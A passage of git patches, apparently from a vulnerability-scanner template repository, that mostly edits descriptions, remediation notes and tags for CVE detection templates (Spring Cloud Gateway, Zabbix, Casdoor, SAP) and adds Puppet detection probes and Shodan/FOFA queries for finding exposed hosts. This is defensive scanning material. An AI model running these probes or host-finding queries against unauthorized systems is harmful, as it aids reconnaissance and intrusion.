- description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
+ description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-22536
- https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022
@@ -57,3 +57,5 @@ requests:
- "HTTP/1.0 500 Internal Server Error"
- "HTTP/1.0 500 Dispatching Error"
condition: or
+
+# Enhanced by mp on 2022/03/08
From dd2d5259895b5acfe80e6f9d51dfff79d6bd5f48 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 10:15:40 -0500
Subject: [PATCH 098/259] Enhancement: cves/2022/CVE-2022-22947.yaml by mp
---
cves/2022/CVE-2022-22947.yaml | 9 +++++++--
1 file changed, 7 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-22947.yaml b/cves/2022/CVE-2022-22947.yaml
index 58c5abcf4a..c02886515d 100644
--- a/cves/2022/CVE-2022-22947.yaml
+++ b/cves/2022/CVE-2022-22947.yaml
@@ -4,13 +4,16 @@ info:
name: Spring Cloud Gateway Code Injection
author: pdteam
severity: critical
- description: Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.
+ description: "Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host."
reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-22947
- https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/
- https://github.com/wdahlenburg/spring-gateway-demo
- https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published
- https://tanzu.vmware.com/security/cve-2022-22947
tags: cve,cve2022,apache,spring,vmware,actuator,oast
+ classification:
+ cve-id: CVE-2022-22947
requests:
- raw:
@@ -74,4 +77,6 @@ requests:
- type: word
part: interactsh_protocol
words:
- - "dns"
\ No newline at end of file
+ - "dns"
+
+# Enhanced by mp on 2022/03/08
From 613ff3f1eb2c004192cb8eed3b27e942ad824c64 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 10:28:19 -0500
Subject: [PATCH 099/259] Enhancement: cves/2022/CVE-2022-23131.yaml by mp
---
cves/2022/CVE-2022-23131.yaml | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-23131.yaml b/cves/2022/CVE-2022-23131.yaml
index 9634717d62..86f675074b 100644
--- a/cves/2022/CVE-2022-23131.yaml
+++ b/cves/2022/CVE-2022-23131.yaml
@@ -5,6 +5,7 @@ info:
author: For3stCo1d
severity: critical
description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.
+ remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher.
reference:
- https://support.zabbix.com/browse/ZBX-20350
- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
@@ -12,7 +13,7 @@ info:
- https://github.com/1mxml/CVE-2022-23131
metadata:
shodan-query: http.favicon.hash:892542951
- fofa-query: app="ZABBIX-监控系统" && body="saml"
+ fofa-query: app="ZABBIX-çæ§ç³»ç»" && body="saml"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.8
@@ -39,4 +40,4 @@ requests:
dsl:
- "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')"
-# Enhanced by mp on 2022/02/28
+# Enhanced by mp on 2022/03/08
From bba904ea87a91f60389e37ec61381395ef8b9672 Mon Sep 17 00:00:00 2001
From: idealphase
Date: Tue, 8 Mar 2022 22:29:09 +0700
Subject: [PATCH 100/259] Updated jamf-panel.yaml
Add jamf pro version extractor
---
exposed-panels/jamf-panel.yaml | 9 ++++++++-
1 file changed, 8 insertions(+), 1 deletion(-)
diff --git a/exposed-panels/jamf-panel.yaml b/exposed-panels/jamf-panel.yaml
index aeffbaed7a..f0e7d9dafe 100644
--- a/exposed-panels/jamf-panel.yaml
+++ b/exposed-panels/jamf-panel.yaml
@@ -22,4 +22,11 @@ requests:
words:
- "Jamf Pro Login"
- "Jamf Cloud Node"
- condition: or
\ No newline at end of file
+ condition: or
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - ''
From 6267ad4fad272b17a250301c55fb3e2cfc203be8 Mon Sep 17 00:00:00 2001
From: idealphase
Date: Tue, 8 Mar 2022 22:32:21 +0700
Subject: [PATCH 101/259] Updated jamf-panel.yaml
Add myname in author
---
exposed-panels/jamf-panel.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/exposed-panels/jamf-panel.yaml b/exposed-panels/jamf-panel.yaml
index f0e7d9dafe..848da57aec 100644
--- a/exposed-panels/jamf-panel.yaml
+++ b/exposed-panels/jamf-panel.yaml
@@ -2,7 +2,7 @@ id: jamf-panel
info:
name: JAMF MDM Panel
- author: pdteam
+ author: pdteam,idealphase
severity: info
metadata:
shodan-query: http.favicon.hash:1262005940
From 303f6f71c64706954357542a5b19f8916ad518a2 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 10:36:27 -0500
Subject: [PATCH 102/259] Enhancement: cves/2022/CVE-2022-23134.yaml by mp
---
cves/2022/CVE-2022-23134.yaml | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-23134.yaml b/cves/2022/CVE-2022-23134.yaml
index b62dd45721..5df57e33c8 100644
--- a/cves/2022/CVE-2022-23134.yaml
+++ b/cves/2022/CVE-2022-23134.yaml
@@ -4,7 +4,7 @@ info:
name: Zabbix Setup Configuration - Unauthenticated Access
author: bananabr
severity: medium
- description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators, but by unauthenticated users as well. Malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
+ description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
reference:
- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
- https://nvd.nist.gov/vuln/detail/CVE-2022-23134
@@ -36,4 +36,6 @@ requests:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
+
+# Enhanced by mp on 2022/03/08
From c2fba36a7a69f07f0016603b959b0516886dce56 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 10:41:08 -0500
Subject: [PATCH 103/259] Enhancement: cves/2022/CVE-2022-23944.yaml by mp
---
cves/2022/CVE-2022-23944.yaml | 9 ++++++---
1 file changed, 6 insertions(+), 3 deletions(-)
diff --git a/cves/2022/CVE-2022-23944.yaml b/cves/2022/CVE-2022-23944.yaml
index 94a797ab85..8fce813a89 100644
--- a/cves/2022/CVE-2022-23944.yaml
+++ b/cves/2022/CVE-2022-23944.yaml
@@ -1,12 +1,13 @@
id: CVE-2022-23944
info:
- name: ShenYu Admin Unauth Access
+ name: Apache ShenYu Admin Unauth Access
author: cckuakilong
severity: medium
- description: User can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.
+ description: "Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1."
+ remediation: Upgrade to Apache ShenYu (incubating) 2.4.2 or apply the appropriate patch.
reference:
- - https://github.com/apache/incubator-shenyu/pull/2462/files
+ - https://github.com/apache/incubator-shenyu/pull/2462
- https://nvd.nist.gov/vuln/detail/CVE-2022-23944
- https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md
classification:
@@ -31,3 +32,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/08
From 1ce8284cbe1324c24458732faf6380c6d77f3197 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 10:51:53 -0500
Subject: [PATCH 104/259] Enhancement: cves/2022/CVE-2022-24112.yaml by mp
---
cves/2022/CVE-2022-24112.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-24112.yaml b/cves/2022/CVE-2022-24112.yaml
index 7922f87e59..eb82122e33 100644
--- a/cves/2022/CVE-2022-24112.yaml
+++ b/cves/2022/CVE-2022-24112.yaml
@@ -1,8 +1,9 @@
id: CVE-2022-24112
info:
- name: Apache APISIX apisix/batch-requests RCE
- description: Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE;An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
+ name: Apache APISIX apisix/batch-requests Remote Code Execution
+ description: "A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed."
+ remediation: "Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`)."
author: Mr-xn
severity: critical
reference:
@@ -75,3 +76,5 @@ requests:
group: 1
regex:
- 'GET \/([a-z-]+) HTTP'
+
+# Enhanced by mp on 2022/03/08
From 9004746e16c8fadfbf050e31fb3526b280ba9192 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 10:54:16 -0500
Subject: [PATCH 105/259] Enhancement: cves/2022/CVE-2022-24124.yaml by mp
---
cves/2022/CVE-2022-24124.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-24124.yaml b/cves/2022/CVE-2022-24124.yaml
index 4e841d6d40..31aa5390ef 100644
--- a/cves/2022/CVE-2022-24124.yaml
+++ b/cves/2022/CVE-2022-24124.yaml
@@ -1,11 +1,12 @@
id: CVE-2022-24124
info:
- name: Casdoor 1.13.0 - SQL Injection (Unauthenticated)
+ name: Casdoor 1.13.0 - Unauthenticated SQL Injection
author: cckuailong
severity: high
- description: The query API in Casdoor before 1.13.1 has a SQL injection vulnerability related to the field and value parameters, as demonstrated by api/get-organizations.
+ description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability. The query API in Casdoor before 1.13.1 has a SQL injection vulnerability related to the field and value parameters, as demonstrated by api/get-organizations.
reference:
+ - https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html
- https://www.exploit-db.com/exploits/50792
- https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget
- https://nvd.nist.gov/vuln/detail/CVE-2022-24124
@@ -36,3 +37,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/08
From 28a422d6584c04a07989be22cd0dfd9572def786 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 10:57:25 -0500
Subject: [PATCH 106/259] Enhancement: cves/2022/CVE-2022-24260.yaml by mp
---
cves/2022/CVE-2022-24260.yaml | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-24260.yaml b/cves/2022/CVE-2022-24260.yaml
index 1e6f03426b..40939405dd 100644
--- a/cves/2022/CVE-2022-24260.yaml
+++ b/cves/2022/CVE-2022-24260.yaml
@@ -1,7 +1,7 @@
id: CVE-2022-24260
info:
- name: VoipMonitor - Pre-Auth SQL injection
+ name: VoipMonitor - Pre-Auth SQL Injection
author: gy741
severity: critical
description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.
@@ -44,4 +44,6 @@ requests:
extractors:
- type: kval
kval:
- - PHPSESSID
\ No newline at end of file
+ - PHPSESSID
+
+# Enhanced by mp on 2022/03/08
From 161ba2c6a25837219e0a6a4669846c0a5117d21d Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 12:29:12 -0500
Subject: [PATCH 107/259] Enhancement: cves/2022/CVE-2022-0692.yaml by mp
---
cves/2022/CVE-2022-0692.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2022/CVE-2022-0692.yaml b/cves/2022/CVE-2022-0692.yaml
index ea0605c14f..8afb4f3093 100644
--- a/cves/2022/CVE-2022-0692.yaml
+++ b/cves/2022/CVE-2022-0692.yaml
@@ -4,7 +4,7 @@ info:
name: Rudloff alltube prior to 3.0.1 - Open Redirect
author: 0x_Akoko
severity: medium
- description: "An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist rudloff/alltube in versions prior to 3.0.1."
+ description: "An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1."
reference:
- https://huntr.dev/bounties/4fb39400-e08b-47af-8c1f-5093c9a51203/
- https://www.cvedetails.com/cve/CVE-2022-0692
From eebef82c6a61e48a4421a5c52f14c37165e4d3a2 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 12:31:20 -0500
Subject: [PATCH 108/259] Enhancement: cves/2022/CVE-2022-21371.yaml by mp
---
cves/2022/CVE-2022-21371.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2022/CVE-2022-21371.yaml b/cves/2022/CVE-2022-21371.yaml
index 05d2b3a606..32db7db2f1 100644
--- a/cves/2022/CVE-2022-21371.yaml
+++ b/cves/2022/CVE-2022-21371.yaml
@@ -4,7 +4,7 @@ info:
name: Oracle WebLogic Server Local File Inclusion
author: paradessia,narluin
severity: high
- description: An easily exploitable local file inclusion vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data.
+ description: An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data.
reference:
- https://www.oracle.com/security-alerts/cpujan2022.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-21371
From 295de3ec7bd5494b2412eb7ad3ea10f0c9cb6ca9 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 12:33:02 -0500
Subject: [PATCH 109/259] Enhancement: cves/2022/CVE-2022-22536.yaml by mp
---
cves/2022/CVE-2022-22536.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-22536.yaml b/cves/2022/CVE-2022-22536.yaml
index e307de2556..74c587f66e 100644
--- a/cves/2022/CVE-2022-22536.yaml
+++ b/cves/2022/CVE-2022-22536.yaml
@@ -4,13 +4,13 @@ info:
name: SAP Memory Pipes (MPI) Desynchronization
author: pdteam
severity: critical
- description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
+ description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-22536
- https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022
- https://github.com/Onapsis/onapsis_icmad_scanner
- https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/
- tags: cve,cve2022,sap,smuggling
+ tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.00
From 2d350e0a2f1e09fabd2cd124d3b41a38bcbe3c8c Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 12:35:20 -0500
Subject: [PATCH 110/259] Enhancement: cves/2022/CVE-2022-23134.yaml by mp
---
cves/2022/CVE-2022-23134.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2022/CVE-2022-23134.yaml b/cves/2022/CVE-2022-23134.yaml
index 5df57e33c8..53aca6a04f 100644
--- a/cves/2022/CVE-2022-23134.yaml
+++ b/cves/2022/CVE-2022-23134.yaml
@@ -1,7 +1,7 @@
id: CVE-2022-23134
info:
- name: Zabbix Setup Configuration - Unauthenticated Access
+ name: Zabbix Setup Configuration Authentication Bypass
author: bananabr
severity: medium
description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
From acb55f3c062190b1ee7efb1a9ddf7653e4ba73cd Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 12:36:49 -0500
Subject: [PATCH 111/259] Enhancement: cves/2022/CVE-2022-23808.yaml by mp
---
cves/2022/CVE-2022-23808.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/cves/2022/CVE-2022-23808.yaml b/cves/2022/CVE-2022-23808.yaml
index 0bdfac1747..a75c89c2f3 100644
--- a/cves/2022/CVE-2022-23808.yaml
+++ b/cves/2022/CVE-2022-23808.yaml
@@ -4,7 +4,7 @@ info:
name: phpMyAdmin < 5.1.2 - Cross-Site Scripting
author: cckuailong
severity: medium
- description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2. An attacker can inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection.
+ description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection.
reference:
- https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A
- https://github.com/dipakpanchal456/CVE-2022-23808
@@ -39,4 +39,4 @@ requests:
words:
- "\">'>"
-# Enhanced by mp on 2022/02/28
+# Enhanced by mp on 2022/03/08
From 7cd9e673caab1741601084e4fb1c658063b59778 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 12:38:46 -0500
Subject: [PATCH 112/259] Enhancement: cves/2022/CVE-2022-24124.yaml by mp
---
cves/2022/CVE-2022-24124.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2022/CVE-2022-24124.yaml b/cves/2022/CVE-2022-24124.yaml
index 31aa5390ef..f940ce92b6 100644
--- a/cves/2022/CVE-2022-24124.yaml
+++ b/cves/2022/CVE-2022-24124.yaml
@@ -4,7 +4,7 @@ info:
name: Casdoor 1.13.0 - Unauthenticated SQL Injection
author: cckuailong
severity: high
- description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability. The query API in Casdoor before 1.13.1 has a SQL injection vulnerability related to the field and value parameters, as demonstrated by api/get-organizations.
+ description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations.
reference:
- https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html
- https://www.exploit-db.com/exploits/50792
From 67e20bc87f63607651545cf5717ff4ccdeee7c3a Mon Sep 17 00:00:00 2001
From: sandeep
Date: Wed, 9 Mar 2022 00:17:22 +0530
Subject: [PATCH 114/259] puppet templates
---
cves/2020/CVE-2020-7943.yaml | 38 +++++++++++++++++++++++++++
exposed-panels/puppetboard-panel.yaml | 22 ++++++++++++++++
technologies/puppetdb-detect.yaml | 34 ++++++++++++++++++++++++
technologies/puppetserver-detect.yaml | 35 ++++++++++++++++++++++++
4 files changed, 129 insertions(+)
create mode 100644 cves/2020/CVE-2020-7943.yaml
create mode 100644 exposed-panels/puppetboard-panel.yaml
create mode 100644 technologies/puppetdb-detect.yaml
create mode 100644 technologies/puppetserver-detect.yaml
diff --git a/cves/2020/CVE-2020-7943.yaml b/cves/2020/CVE-2020-7943.yaml
new file mode 100644
index 0000000000..1f5454db70
--- /dev/null
+++ b/cves/2020/CVE-2020-7943.yaml
@@ -0,0 +1,38 @@
+id: CVE-2020-7943
+
+info:
+ name: Puppet Server and PuppetDB sensitive information disclosure
+ severity: high
+ author: c-sh0
+ description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information
+ reference:
+ - https://puppet.com/security/cve/CVE-2020-7943
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-7943
+ - https://tickets.puppetlabs.com/browse/PDB-4876
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2020-7943
+ cwe-id: CWE-276
+ tags: cve,cve2020,puppet,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/metrics/v1/mbeans"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "application/json"
+
+ - type: word
+ part: body
+ words:
+ - "trapperkeeper"
diff --git a/exposed-panels/puppetboard-panel.yaml b/exposed-panels/puppetboard-panel.yaml
new file mode 100644
index 0000000000..756a13079d
--- /dev/null
+++ b/exposed-panels/puppetboard-panel.yaml
@@ -0,0 +1,22 @@
+id: puppetboard-panel
+
+info:
+ name: Puppetlabs Puppetboard
+ author: c-sh0
+ severity: info
+ metadata:
+ shodan-query: http.title:"Puppetboard"
+ tags: panel,puppet,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ redirects: true
+ max-redirects: 2
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Puppetboard"
\ No newline at end of file
diff --git a/technologies/puppetdb-detect.yaml b/technologies/puppetdb-detect.yaml
new file mode 100644
index 0000000000..b5d55d64bf
--- /dev/null
+++ b/technologies/puppetdb-detect.yaml
@@ -0,0 +1,34 @@
+id: puppetdb-detect
+
+info:
+ name: PuppetDB Detection
+ author: c-sh0
+ severity: info
+ reference: https://puppet.com/docs/puppetdb/7/api/meta/v1/version.html#pdbmetav1version
+ tags: puppet,tech,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/pdb/meta/v1/version"
+
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
+
+ - type: word
+ part: body
+ words:
+ - '"version"'
+
+ extractors:
+ - type: regex
+ group: 1
+ regex:
+ - '"version"\s:\s"([0-9.]+)"'
diff --git a/technologies/puppetserver-detect.yaml b/technologies/puppetserver-detect.yaml
new file mode 100644
index 0000000000..08ee862fbb
--- /dev/null
+++ b/technologies/puppetserver-detect.yaml
@@ -0,0 +1,35 @@
+id: puppetserver-detect
+
+info:
+ name: Puppetserver Detection
+ author: c-sh0
+ severity: info
+ reference: https://insinuator.net/2020/09/puppet-assessment-techniques/
+ tags: tech,puppet,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/puppet-ca/v1/certificate_request/{{randstr}}"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 404
+
+ - type: word
+ part: header
+ words:
+ - "x-puppet-version"
+ case-insensitive: true
+
+ - type: word
+ part: body
+ words:
+ - "{{randstr}}"
+
+ extractors:
+ - type: kval
+ kval:
+ - x_puppet_version
\ No newline at end of file
From 650f9ea355aeeb15dc6604d917db67773959fc0a Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 15:18:50 -0500
Subject: [PATCH 115/259] Enhancement:
default-logins/google/google-earth-dlogin.yaml by mp
---
default-logins/google/google-earth-dlogin.yaml | 14 +++++++++++---
1 file changed, 11 insertions(+), 3 deletions(-)
diff --git a/default-logins/google/google-earth-dlogin.yaml b/default-logins/google/google-earth-dlogin.yaml
index 8e29091076..f6c4e88387 100644
--- a/default-logins/google/google-earth-dlogin.yaml
+++ b/default-logins/google/google-earth-dlogin.yaml
@@ -4,8 +4,14 @@ info:
name: Google Earth Enterprise Default Login
author: orpheus,johnjhacking
severity: high
- tags: default-login,google
- reference: https://www.opengee.org/geedocs/5.2.2/answer/3470759.html
+ description: Google Earth Enterprise default login credentials were discovered.
+ remediation: "To reset the username and password:
+sudo /opt/google/gehttpd/bin/htpasswd -c
+/opt/google/gehttpd/conf.d/.htpasswd geapacheuse"
+ tags: default-login,google-earth
+ reference:
+ - https://johnjhacking.com/blog/gee-exploitation/
+ - https://www.opengee.org/geedocs/5.2.2/answer/3470759.html
metadata:
shodan-query: 'title:"GEE Server"'
@@ -34,4 +40,6 @@ requests:
condition: and
words:
- 'DashboardPanel'
- - 'Earth Enterprise Server'
\ No newline at end of file
+ - 'Earth Enterprise Server'
+
+# Enhanced by mp on 2022/03/08
From 218c39a886e044695b945de3c1375600b0b7d0a1 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Tue, 8 Mar 2022 15:37:51 -0500
Subject: [PATCH 116/259] Enhancement:
default-logins/gophish/gophish-default-login.yaml by mp
---
default-logins/gophish/gophish-default-login.yaml | 9 +++++++--
1 file changed, 7 insertions(+), 2 deletions(-)
diff --git a/default-logins/gophish/gophish-default-login.yaml b/default-logins/gophish/gophish-default-login.yaml
index 9b2b924bb1..0f459602a9 100644
--- a/default-logins/gophish/gophish-default-login.yaml
+++ b/default-logins/gophish/gophish-default-login.yaml
@@ -1,10 +1,13 @@
id: gophish-default-login
info:
- name: Gophish < v0.10.1 default credentials
+ name: Gophish < v0.10.1 Default Credentials
author: arcc,dhiyaneshDK
severity: high
tags: gophish,default-login
+ description: For versions of Gophish > 0.10.1, the temporary administrator credentials are printed in the logs when you first execute the Gophish binary.
+ reference:
+ - https://docs.getgophish.com/user-guide/getting-started
requests:
- raw:
@@ -43,4 +46,6 @@ requests:
- "contains(tolower(all_headers), 'location: /')"
- "contains(tolower(all_headers), 'gophish')"
- "status_code==302"
- condition: and
\ No newline at end of file
+ condition: and
+
+# Enhanced by mp on 2022/03/08
From 48675b803ab30053e8f75af2c06cd9c6f22e1b10 Mon Sep 17 00:00:00 2001
From: sullo
Date: Tue, 8 Mar 2022 17:38:14 -0500
Subject: [PATCH 117/259] Fix control character issue
---
cves/2022/CVE-2022-23131.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2022/CVE-2022-23131.yaml b/cves/2022/CVE-2022-23131.yaml
index 86f675074b..53811d3852 100644
--- a/cves/2022/CVE-2022-23131.yaml
+++ b/cves/2022/CVE-2022-23131.yaml
